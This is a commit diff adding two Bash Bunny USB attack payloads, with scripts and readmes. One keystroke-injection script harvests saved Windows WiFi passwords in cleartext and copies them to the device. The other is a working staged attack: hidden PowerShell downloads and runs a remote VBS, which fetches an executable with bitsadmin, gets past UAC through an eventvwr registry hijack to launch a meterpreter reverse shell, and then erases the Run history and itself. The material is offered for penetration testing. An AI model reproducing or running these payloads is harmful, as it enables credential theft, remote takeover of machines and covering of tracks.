Added WindowsMeterpreterStaged and WiFiGrabber payloads (#85)

* added wifi grabber and windows meterpreter staged payload

* created details and updated content of payloads - ready for publication to hak5 bash bunny scripts

* created details and updated content of payloads - ready for publication to hak5 bash bunny scripts

* Added a rename file

* added the rename file

payloads/library/WifiGrabber/ducky_script.txt

@@ -0,0 +1,69 @@
+REM Title: WiFi password grabber for the bash bunny
+REM Author: Silvian
+REM Props: Siem, Darren Kitchen
+REM Version: 1
+REM Description: Saves the SSID, Network type, Authentication and the password to Log.txt
+DELAY 1000
+GUI r
+DELAY 1000
+STRING powershell Start-Process cmd -Verb runAs
+ENTER
+DELAY 2000
+LEFT
+DELAY 1000
+ENTER
+DELAY 1000
+
+REM Delete registry keys storing Run dialog history
+STRING REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
+ENTER
+
+REM --> Getting SSID
+STRING cd "%TEMP%" & for /f "tokens=2 delims=: " %A in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "BSSID"') do set A=%A
+ENTER
+
+REM --> Creating A.txt
+STRING netsh wlan show profiles %A% key=clear | findstr /c:"Network type" /c:"Authentication" /c:"Key Content" | findstr /v "broadcast" | findstr /v "Radio">>A.txt
+ENTER
+
+REM --> Get network type
+STRING for /f "tokens=3 delims=: " %A in ('findstr "Network type" A.txt') do set B=%A
+ENTER
+
+REM --> Get authentication
+STRING for /f "tokens=2 delims=: " %A in ('findstr "Authentication" A.txt') do set C=%A
+ENTER
+
+REM --> Get password
+STRING for /f "tokens=3 delims=: " %A in ('findstr "Key Content" A.txt') do set D=%A
+ENTER
+
+REM --> Delete A.txt
+STRING del A.txt
+ENTER
+
+REM --> Create Log.txt
+STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt
+ENTER
+
+REM Creates directory compromised of computer name, date and time
+REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
+STRING for /f %D in ('wmic volume get DriveLetter^, Label ^| find "BashBunny"') do set usb=%D
+ENTER
+DELAY 200
+ENTER
+
+REM Create directory on the bash bunny as wifi creds and computer name and date time stamp
+STRING set dst=%usb%\loot\WiFi_Creds\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
+ENTER
+DELAY 200
+ENTER
+STRING mkdir %dst% >>nul
+ENTER
+
+REM Move the Log.txt to the created directory on the bash bunny
+STRING move Log.txt %dst% >>nul
+ENTER
+DELAY 100
+STRING exit
+ENTER

payloads/library/WifiGrabber/payload.txt

@@ -0,0 +1,38 @@
+#!/bin/bash
+
+# @title: WiFi Windows password grabber for the bash bunny
+# @author: Silvian Dragan
+# @props: Siem, Darren Kitchen
+# @version: 1.0
+# @target: Windows 7 (not tested for 8 and above)
+#
+#
+# @details: This is a simple Wifi password grabber tested and working for Windows 7
+# However this has not been tested on Windows 8 and above and any suggestions and
+# improvements are greatly welcomed. Powershell scripting isn't higest skill so
+# I'm sure I'll have much to learn.
+#
+#
+# Colors:
+#         Purple: starts the attack payload
+#         Green: successful execution
+#         Red: failure to load dependency ducky script
+#
+
+
+ATTACKMODE HID STORAGE
+
+LED R B 200
+
+LANGUAGE=‘us’
+
+source bunny_helpers.sh
+
+if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
+        QUACK ${SWITCH_POSITION}/ducky_script.txt
+        LED G
+else
+    LED R
+    echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
+        exit 1
+fi

payloads/library/WifiGrabber/readme.md

@@ -0,0 +1,24 @@
+# Windows Wifi Credentials Grabber
+
+* Author: Silvian
+* Version: Version 1.0
+* Target: Windows 7 (not tested on Windows 8 and above)
+
+## Description
+
+This is a simple Wifi password grabber tested and working for Windows 7
+However this has not been tested on Windows 8 and above and any suggestions and
+improvements are greatly welcomed. Powershell scripting isn't higest skill so
+I'm sure I'll have much to learn from sharing this code with everyone. :)
+
+## Dependencies
+
+Everything is included - no extra dependencies needed to run this payload.
+
+## STATUS
+
+| LED                | Status                                       |
+| ------------------ | -------------------------------------------- |
+| Purple             | Starts the attack payload                    |
+| Green              | successful execution                         |
+| Red                | failure to load dependency ducky script      |

payloads/library/WindowsMeterpreterStaged/payload.txt

@@ -0,0 +1,48 @@
+#!/bin/bash
+#
+# @title: Bash bunny Windows staged meterpreter payload
+# @author: Silvian Dragan
+# @props: Darren Kitchen, Mubix
+# @version: 1.0
+# @target: Windows 7 8, 8.1 and 10.
+#
+#
+# @details: This is an a advanced meterpreter staged payload injection using the
+# rubber ducky capabilites of the bash bunny to call a powershell script referred
+# to sc.txt which must be hosted on a remote server.
+# This script then downloads the update.exe which is also hosted on
+# a remote host, and then executes it on the target machine.
+# note it will also attempt to clean up any registry footprint from the run command.
+# Once the bash bunny is initialized the script should not take more than
+# 2-3 sec to execute.
+#
+# @Dependencies: you must have sc.txt and update.exe hosted on a remote server.
+# replace the 127.0.0.1 with your own host and also feel free to change the name
+# of either sc.txt or update.exe to names of your choosing.
+# You must also generate the appropariate update.exe payload using msfvenom for
+# windows meterpreter reverse http/https/tcp etc. Please see Mubix's fantastic
+# tutorials on metasploit minute/ meterpreter/ msfvenom for details. :)
+#
+# Colors:
+#         Amber: starts the attack payload
+#         Green: successful execution
+#         Red: failure to load dependency ducky script
+#
+
+
+ATTACKMODE HID
+
+LED R G 200
+
+LANGUAGE='us'
+
+source bunny_helpers.sh
+
+if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky.txt" ]; then
+        QUACK ${SWITCH_POSITION}/windows-staged-meterpreter.txt
+        LED G
+else
+    LED R
+    echo "Unable to load dwindows-staged-meterpreter.txt" >> /root/debuglog.txt
+        exit 1
+fi

payloads/library/WindowsMeterpreterStaged/readme.md

@@ -0,0 +1,32 @@
+# Windows Meterpreter staged payload
+
+* Author: Silvian
+* Version: Version 1.0
+* Target: Windows 7, 8, 8.1, 10
+
+## Description
+
+This is an a advanced meterpreter staged payload injection using the
+rubber ducky capabilites of the bash bunny to call a powershell script referred
+to sc.txt which must be hosted on a remote server.
+This script then downloads the update.exe which is also hosted on
+a remote host, and then executes it on the target machine.
+Note it will also attempt to clean up any registry footprint from the run command.
+Once the bash bunny is initialized the script should not take more than 2-3 sec to execute.
+
+## Dependencies
+
+you must have sc.txt and update.exe hosted on a remote server.
+replace the 127.0.0.1 with your own host and also feel free to change the name
+of either sc.txt or update.exe to names of your choosing.
+You must also generate the appropariate update.exe payload using msfvenom for
+windows meterpreter reverse http/https/tcp etc. Please see Mubix's fantastic
+tutorials on metasploit minute/ meterpreter/ msfvenom for details. :)
+
+## STATUS
+
+| LED                | Status                                       |
+| ------------------ | -------------------------------------------- |
+| Amber              | Executin Payload                             |
+| Green              | Attack Finished                              |
+| Red                | Failed to load dependencies                  |

payloads/library/WindowsMeterpreterStaged/sc.txt

@@ -0,0 +1,30 @@
+Sub Main()
+	'Download File
+	CreateObject("WScript.Shell").run("cmd /c bitsadmin /transfer SoftUpdate /download /priority FOREGROUND http://127.0.0.1/update.exe %temp%/update.exe"),0,true
+	'Set new zoneId
+	CreateObject("WScript.Shell").run("cmd.exe /C echo [zoneTransfer]ZoneID = 2 > " + CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) + "\update.exe:ZONE.identifier"),0,true
+	'Write UAC bypass regkey
+	CreateObject("WScript.Shell").RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) +"\update.exe" ,"REG_SZ"
+	'Trigger UAC bypass
+	CreateObject("WScript.Shell").Run("eventvwr.exe"),0,true
+	'Reset regkey
+	GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & "." & "\root\default:StdRegProv").DeleteValue &H80000001,"Software\Classes\mscfile\shell\open\command\",""
+	'Remove this script
+
+	CreateObject("WScript.Shell").Run "cmd /c del " + WScript.ScriptFullName, 0, False
+End Sub
+'Dont wanna display shit
+On Error Resume Next
+
+  Main
+
+
+  If Err.Number Then
+
+     'on error cleanup and exit
+
+	CreateObject("WScript.Shell").Run "cmd /c del " + WScript.ScriptFullName, 0, False
+
+     WScript.Quit 4711
+
+End If

payloads/library/WindowsMeterpreterStaged/windows-staged-meterpreter.txt

@@ -0,0 +1,7 @@
+REM change 127.0.0.1 to the IP address or host name of your own host service
+
+DELAY 1000
+GUI r
+DELAY 100
+STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://127.0.0.1/sc.txt', '%temp%/update.vbs'); %temp%/update.vbs
+ENTER